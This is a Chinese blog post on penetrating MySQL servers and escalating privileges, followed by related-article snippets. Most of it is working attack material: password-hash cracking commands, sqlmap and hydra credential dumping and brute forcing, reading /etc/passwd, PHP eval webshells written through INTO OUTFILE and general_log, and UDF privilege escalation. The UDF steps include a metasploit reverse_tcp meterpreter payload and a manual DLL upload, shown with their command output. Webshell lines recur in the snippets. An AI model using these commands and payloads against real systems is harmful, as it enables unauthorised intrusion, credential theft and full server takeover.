mysql渗透提权知识

最新推荐文章于 2025-07-06 01:20:52 发布
最新推荐文章于 2025-07-06 01:20:52 发布
阅读量1.2k 收藏 3
点赞数
CC 4.0 BY-SA版权
分类专栏: web安全 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/u014578907/article/details/88247478

title: mysql渗透提权知识
date: 2018-06-30 21:55:07
categories: 安全
tags: MySQL

一、MySQL默认库表介绍

mysql安装后会默认存在3个库,包括information_schema,mysql和performance_schema。

performance_schema提供了访问数据库元数据的方式。元数据是关于数据的数据,如数据库名或表名,列的数据类型,或访问权限等。

mysql5.5之后新增了PERFORMANCE_SCHEMA数据库。主要用于收集数据库服务器性能参数。

mysql库保存MySQL的账户,密码,权限、参数、对象和状态信息等。

其中最重要的是myql库的user表,存储了用户名,密码,可连接主机等信息。

其中host表示可连接主机,locahost,127.0.0.1和::1都表示只允许本地登录,为%时表示所有主机都可以登录。

二、MySQL密码加密方式与破解

mysql的密码加密方式为mysqlsha1加密。

加密公式为:password_str =concat(‘*’, sha1(unhex(sha1(password))))

即先对密码sha1加密,然后16位进制转为字符串,在使用sha1加密,最后加上*

如密码为root,加密后即为*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B。用python演示的加密过程

>>> import hashlib,binascii
>>> pwd='root'
>>> tmp1=hashlib.sha1(pwd.encode('utf-8')).hexdigest()    #第一次sha1加密
>>> tmp1
'dc76e9f0c0006e8f919e0c515c66dbba3982f785'
>>> tmp2=binascii.a2b_hex(tmp1)    #16位进制转字符串
>>> tmp2
b'\xdcv\xe9\xf0\xc0\x00n\x8f\x91\x9e\x0cQ\\f\xdb\xba9\x82\xf7\x85'
>>> password=hashlib.sha1(tmp2).hexdigest()  #第二次sha1加密
>>> password
'81f5e21e35407d884a6cd4a731aebfb6af209e1b'

对加密后的密码进行破解

  1. 使用在线网站进行破解

    http://www.cmd5.com/

    http://www.mysql-password.com/hash

  2. 使用工具破解

    hashcat工具:

    hashcat64.exe 01A6717B58FF5C7EAFFF6CB7C96F7428EA65FE4C --force -a 0 -m 300 dict.txt

    如图,输出了结果admin123,其中dict.txt为字典, -m 300表示要破解的是mysql密码,-a 0 字典模式

    参考Hash破解神器:Hashcat的简单使用

    John the ripper工具

    john --wordlist=dict.txt -format=MySQL-sha1 hash.txt

    其中dict.txt为字典, hash.txt为mysql密码,-format=MySQL-sha1表示加密方式mysqlsha1。

三、获取MySQL密码

存在注入点时获取密码

当网站存在注入点时可以使用sqlmap工具获取mysql的用户名和密码等信息。

获取用户列表

python2 sqlmap.py -r test.txt --users

获取用户密码

python2 sqlmap.py -r test.txt --password

或者也直接手工注入查询mysql库的user表。

爆破获取mysql密码

  1. hydra工具

    hydra -l 用户名 -P 密码字典 ip mysql

  2. metasploit模块

    use auxiliary/scanner/mysql/mysql_login
# 设置目标主机
set RHOSTS 192.168.99.100
#需要爆破的用户名
set USERNAME root
#密码字典
set PASS_FILE /root/Downloads/dict.txt
exploit

四、读写文件与获取shell

当存在注入点获取密码或者通过其它方式获取密码后,连接上MySQL时就可以尝试读取敏感文件,提权,写入shell。

  1. 读取文件 LOAD_FILE
    执行 SELECT LOAD_FILE('/etc/passwd');
    可以读取/etc/passwd 的文件,也可以输入其它的文件,读取文件时,需要对mysql启动账户对文件具有读权限,否则无法查看,同时文件必须小于 max_allowed_packet 。
    读取文件时可以查看一些配置文件,如apache配置文件,虚拟站点配置文件等。

    参考 MySQL注入load_file常用路径

  2. 写入shell INTO_OUTFILE

    使用 SELECT ··· INTO_OUTFILE ···的方式可以写入shell到指定文件中,例如

    select '<?php @eval($_POST[test]);?>'INTO OUTFILE 'D:/tools/phpStudy/WWW/test.php'

    但是一般情况会失败,提示The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

    secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。

    • ure_file_priv的值为null ,表示限制mysqld 不允许导入|导出
    • 当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下
    • 当secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制

    查看secure_file_priv的值语句,show global variables like '%secure%';

    当secure_file_priv可以写入时,也需要mysql具有对文件的写权限才可以,否则仍然无法写入文件。

  3. general_log_file写入shell

    general_log 为mysql日志保存选项,当打开时会将mysql查询记录保存到文件中。

    general_log_file 为日志的保存路径。

    可以将general_log 开启,然后将general_log_file 设置为php文件,然后输入webshell的查询语句,即可写入shell。

    具体命令

    set global general_log = "ON";
SET global general_log_file='D:/tools/phpStudy/WWW/test.php';
select '<?php eval($_POST[test]);?>';

    这种方法也需要mysql对指定目录具有写权限,否则无法写入。

五、MySQL UDF提权

UDF为User Defined Function-用户自定义函数 ,当拥有mysql权限的时候,可以通过上传lib_mysqludf_sys 文件的方式,创建UDF进行提权。

提权条件限制

mysql拥有导入文件目录的写权限。

从MySQL 5.0.67开始,UDF库必须包含在plugin文件夹中。

方法一、使用sqlmap提权(失败)

python2 sqlmap.py -d "mysql://root:root@192.168.99.100:3306/test" --os-shell
...
#选择mysql位数
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 1
#上传dll文件	
[00:52:17] [INFO] the local file 'c:\users\cheng\appdata\local\temp\sqlmap9rxqye15264\lib_mysqludf_sysn7cb6z.dll' and the remote file './libsslta.dll' have the same size (6144 B)
[00:52:17] [INFO] going to use injected sys_eval and sys_exec user-defined functions for operating system command execution
[00:52:17] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] y
[00:52:32] [WARNING] (remote) (_mysql_exceptions.OperationalError) (1305, 'FUNCTION test.sys_eval does not exist')

在创建了os-shell后运行命令未成功,查看是dll文件没有上传到plugin目录。

方法二、使用metasploit提权

use exploit/multi/mysql/mysql_udf_payload
set RHOST 192.168.99.100
set PASSWORD root
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.99.1
exploit

运行后虽然上传了udf文件,创建了sys_exec()函数,但是没有返回session。此时可以通过mysql连接手动创建sys_eval()函数。

#先查询上传udf文件名
mysql> select * from mysql.func where name = 'sys_exec';
+----------+-----+--------------+----------+
| name     | ret | dl           | type     |
+----------+-----+--------------+----------+
| sys_exec |   2 | QApbQCTY.dll | function |
#创建sys_eval函数
mysql> create function sys_eval returns string soname 'QApbQCTY.dll';
Query OK, 0 rows affected (0.00 sec)
#测试运行whoami
mysql> select sys_eval('whoami');
+-----------------------+
| sys_eval('whoami')    |
+-----------------------+
| win-88jdvt747gh\test|
+-----------------------+
1 row in set (0.14 sec)

方法三、手动输入语句提权

先上传lib_mysqludf_sys文件,然后创建udf函数。

获取lib_mysqludf_sys的16进制,这里直接使用msf的lib_mysqludf_sys文件。文件目录为/usr/share/metasploit-framework/data/exploits/mysql/

  1. 获取lib_mysqludf_sys的16进制文件。

     登录本地mysql,导出文件

    select hex(load_file('/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_32.dll')) into outfile '/tmp/hex.txt';

  2. 登录远程目标机mysql,查询目标机系统情况和插件目录。

    mysql> select @@version_compile_os, @@version_compile_machine;
+----------------------+---------------------------+
| @@version_compile_os | @@version_compile_machine |
+----------------------+---------------------------+
| Win32                | 32                        |
+----------------------+---------------------------+
1 row in set (0.00 sec)

mysql> select @@plugin_dir;
+----------------------------+
| @@plugin_dir               |
+----------------------------+
| E:\xampp\mysql\lib\plugin\ |
+----------------------------+
1 row in set (0.00 sec)

  3. 将数据导入到mysql插件目录

    select unhex('4D5A900003000000040...00000000000')into dumpfile "E:\\xampp\\mysql\\lib\\plugin\\lib_mysqludf_sys_32.dll";

  4. 创建sys_eval函数

    mysql> create function sys_eval returns string soname 'lib_mysqludf_sys_32.dll';
Query OK, 0 rows affected (0.06 sec)

# 测试运行命令
mysql> select sys_eval('whoami');
+-----------------------+
| sys_eval('whoami')    |
+-----------------------+
| win-88jdvt747gh\test |
+-----------------------+
1 row in set (0.18 sec)

windows中mysql安装时默认不会创建plugin文件夹,可以使用以下方法进行创建。但是本地测试时没有成功,以上在windows测试都是手动创建的 ? 。

select 'xxx' into dumpfile 'E:\\xampp\\mysql|\lib::$INDEX_ALLOCATION';          # 新建目录lib
select 'xxx' into dumpfile 'E:\\xampp\\mysql\\lib\plugin::$INDEX_ALLOCATION';  # 新建目录plugin

参考:

https://err0rzz.github.io/2017/12/26/UDF-mysql/

https://xz.aliyun.com/t/2167#toc-4

网络安全系列&网安实践系列:利用MSF对MYSQL进行简单的UDF
weixin_54626591的博客
10-23 251
利用MSF对MYSQL进行简单的UDF
内网渗透之——mysql数据库之——开机启动项
wsnbbz的博客
03-11 860
:只能在windows使用 原理 利用mysql,将后门写入开机自启动项,因为是开机自启动,在写入之后,需要重启目标服务器才能生效(要求mysql限要很高,至少是管理员限甚至需要system限) 开机启动程序上传路径 C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startu...
mysql udf_mysql数据库漏洞利用及方式小结
weixin_39971435的博客
12-05 764
转先知社区作者:ghtwf01CVE-2012-2122 Mysql身份认证漏洞影响版本Mysql在5.5.24之前MariaDB也差不多这个版本之前漏洞原理只要知道用户名,不断尝试就能够直接登入SQL数据库,按照公告说法大约256次就能够蒙对一次漏洞复现msf利用hash解密得到密码即可登录python exp#!/usr/bin/pythonimport subprocesswhi...
MySQL 漏洞
最新发布
m0_73399576的博客
07-06 821
知识面,决定看到的攻击面有多广。知识链,决定发动的杀伤链有多深。
渗透测试Mysql
m0_46490129的博客
07-27 150
** Mysql **phpmyadmin篇 利用条件: 有足够限 “secure_file_priv” 对应的值不能为空且必须默认网站路径 利用过程: 查询:SHOW VARIABLES LIKE "secure_file_priv" 默认网站路径 selcet'<?php @eval($_REQUEST[7]);?>'INTO OUTFILE 'C:\\phpStudy\\PHPTutoria\\WWW\\5.php'
[渗透测试篇]数据库系统渗透Mysql
qq_43668710的博客
04-18 393
上日程,月末前完成
Mysql实战
永不垂头的博客
08-07 211
Mysql实战 Mysql实战 into outfile select * from table into outfile ‘/路径/文件名’ 1.需要知道物理路径 2. magic_quotes_gpc()=off(phpinfo.php) 3.限支持 写限 http://192.168.1.105:800/510cms2/news.php?cid=&listid=&newsid=27 and 1=2 UNION SELECT 1,2,3,’<?php eval($P
Mysql数据库的UDF
CoffeMilk的博客
11-05 4233
渗透人员编写可调用系统命令行(CMD或shell)的文件生成动态链接库(Windows系统是.dll;Linux系统是.so),且将该动态链接库内容上传到MySql的函数插件文件夹目录下;然后在通过sql语句调用该动态链接库创建一个自定义函数,最后直接调用该自定义函数sql执行查询系统命令,实现(即:在数据库中的查询就等价于直接在系统调用cmd或者shell中执行命令)
渗透测试
07-18
通过上述步骤和技术细节,我们可以看到渗透测试中的技术是一个复杂且多变的过程,涉及到多个方面的知识和技术。在实际操作中,还需要结合具体情况灵活运用,不断学习最新的漏洞和技巧。
mysql4大招数mysql4大招数
06-02
在安全领域,MySQL 技术是渗透测试人员常用的一种手段,通过对 MySQL 数据库服务器的漏洞利用,实现从数据库层面获取更高级别的系统限。本文将详细阐述 MySQL 的四种常见方法:UDF 、VBS 、...
暗月MySQL工具全版本使用教程解析
由于“”在网络安全领域是一个敏感且专业的话题,这里我将供一些一般性的知识点,而不是教授如何实际使用特定工具进行操作。 知识点: 1. MySQL数据库基础 MySQL是一个流行的开源关系型数据库管理系统...
Mysql漏洞利用(越,实战怎么从低限拿到root密码)
07-30
Mysql漏洞利用(越,实战怎么从低限拿到root密码)
mysql UDF(实战案例)
qq_27683317的博客
10-03 1637
mysql UDFdll(windows,dll文件是c语言写的,可以看作是一个存入很多功能的库)或者os(linux)文件是动态链接文件。# 查询plugin目录的位置 show VARIABLES LIKE '%plugin%';# 查询系统位数 show VARIABLES LIKE '%compile%';# 查询读写限 show VARIABLES LIKE '%secure%';作者:程序那点事儿 日期:2024/09/29 16:10。注意:没有plugin目录会报错,要自己创建该目录。
mysql_黑客渗透网站实战mysql操作,你明白吗???
weixin_39856630的博客
11-29 444
1、Mysql简介我们都知道网站所用脚本之间的不同限也就大概的可以看出来,jsp 的默认限一般都是 system 限,而 aspx 的一般来说都高于 user 限,一般来说。asp 和 PHP 的限差不多,Pl ,cgi ,py 的限一般和 Aspx 的差不多,MySQL 数据库之前,也就是最重要的一点,我们要知道 root 账号和密码,这个也就是最重要的,因为他有写入限啊!...
数据库(实战案例)
2201_75341517的博客
06-13 1956
本文主要介绍常见数据库如何进行操作,如mysql(mof,udf,启动项),mssql,orcale数据库,
mysqludf图文教程_教程:实战mysql root限UDF轻松拿下服务器
weixin_39907850的博客
01-18 189
教程:实战mysqlroot限UDF轻松拿下服务器(2014-07-06 13:54:27)标签:it主题:实战mysqlroot限UDF轻松拿下服务器by:lxsky得到一个php webshell ,发现竟然是root限的mysql数据库账号,不能错过,正好做一个实战教程.1:得到mysql的root账号密码,可以找网站配置文件,不同网站系统位置不同.#[数据库参数]$...
简单的Mysql/Mssql应用程序
m0_74326506的博客
07-13 2403
UDF是用户自定义函数,其为mysql的一个拓展接口,可以为mysql增添一些函数。比如mysql一些函数没有,则可以自己用UDF加函数进去,加了之后就可以创建使用。
数据库之Mysql
白帽黑客鹏哥的博客
05-29 1870
UDF(user defined function)⽤户⾃定义函数,是 mysql 的⼀个拓展接⼝。⽤户可以通过⾃定义函数实现在mysql中⽆法⽅便实现的功能,其添加的新函数都可以在 sql 语句中调⽤,就像调⽤本机函数⼀样。 先前条件关于mysql的密码,可以通过假设的网站的配置文件获取,如login.php、config.inc.php等文件获取在默认情况下,mysql只允许本地登录,我们知道可以通过navicat去连接数据库(在知道帐号密码的情况下),但是如果只允许本地登录的情况下,即使知道账号密码的
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值